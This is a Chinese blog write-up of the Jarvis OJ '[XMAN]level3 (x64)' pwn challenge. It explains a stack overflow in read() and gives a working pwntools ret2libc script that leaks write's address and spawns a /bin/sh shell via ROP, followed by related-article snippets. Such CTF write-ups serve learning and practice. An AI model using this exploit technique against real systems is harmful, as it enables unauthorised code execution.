18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)

最新推荐文章于 2021-09-26 16:21:53 发布
最新推荐文章于 2021-09-26 16:21:53 发布
阅读量459 收藏 1
点赞数 2
分类专栏: PWN_WP 文章标签: [XMAN]level3(x64) Jarvis OJ PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/82780720
版权

解压之后有两个文件,其中一个是lib,checksec后发现没有栈保护,wo,好想知道该怎么做了

拖进IDA看一下哪里可以溢出

read函数可以溢出

然后根据偏移量把system函数和/bin/sh在内存的位置提取出来

同样采取rop代码,注意64位的传参数顺序哦

上脚本

#代码主体

write_got=bin.got['write']
write_plt=bin.plt['write']
rdi=0x00000000004006b3
rsi=0x00000000004006b1
payload='a'*(0x80+0x08)+p64(rdi)+p64(1)+p64(rsi)+p64(write_got)+p64(8)+p64(write_plt)+p64(0x4005E6)
cn.recvline()
cn.sendline(payload)
write_addr=u64(cn.recv(8))
system_addr=write_addr-libc.symbols['write']+libc.symbols['system']
sh_addr=write_addr-libc.symbols['write']+libc.search('/bin/sh').next()
payload2='a'*(0x80+0x08)+p64(rdi)+p64(sh_addr)+p64(system_addr)
cn.recvline()
cn.sendline(payload2)
cn.interactive()

 

xiaoyuyulala
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 958
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
jarvisoj_level3_x64
m0sway的博客
11-26 596
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
Jarvis OJ [XMAN]level3(x64)
九层台
07-09 1075
liu@liu-F117-F:~/桌面/oj/level3_x64$ checksec level3_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3_x64/level3_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
JarvisOJ level3_x64
PLpa的博客
07-09 1010
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 527
JarvisOj pwn level3_x64 这一道题和level3那道题很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
Python库 | jarvis_ironman-5.3.1-py2.py3-none-any.whl
02-16
Python库“jarvis_ironman-5.3.1-py2.py3-none-any.whl”是一个用于Python开发的重要工具,特别适用于后端开发。这个库的版本为5.3.1,支持Python 2和Python 3两种解释器,表明它具有良好的向后兼容性,能满足不同...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 287
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 380
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
Jarvis OJ - pwn level3-64
hanqdi_的博客
02-10 267
pwn - level3_x64 检查保护机制 只开启了NX保护,堆栈不可执行保护。 放入ida分析,发现read栈溢出。 思路:没有system和binsh的情况下,在read函数前有write函数运行,可以通过泄漏write函数的地址来泄漏libc版本,从而泄漏system和binsh地址。 泄漏write函数,需要调用write(1,write_got,0x08) ...
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 326
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 468
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值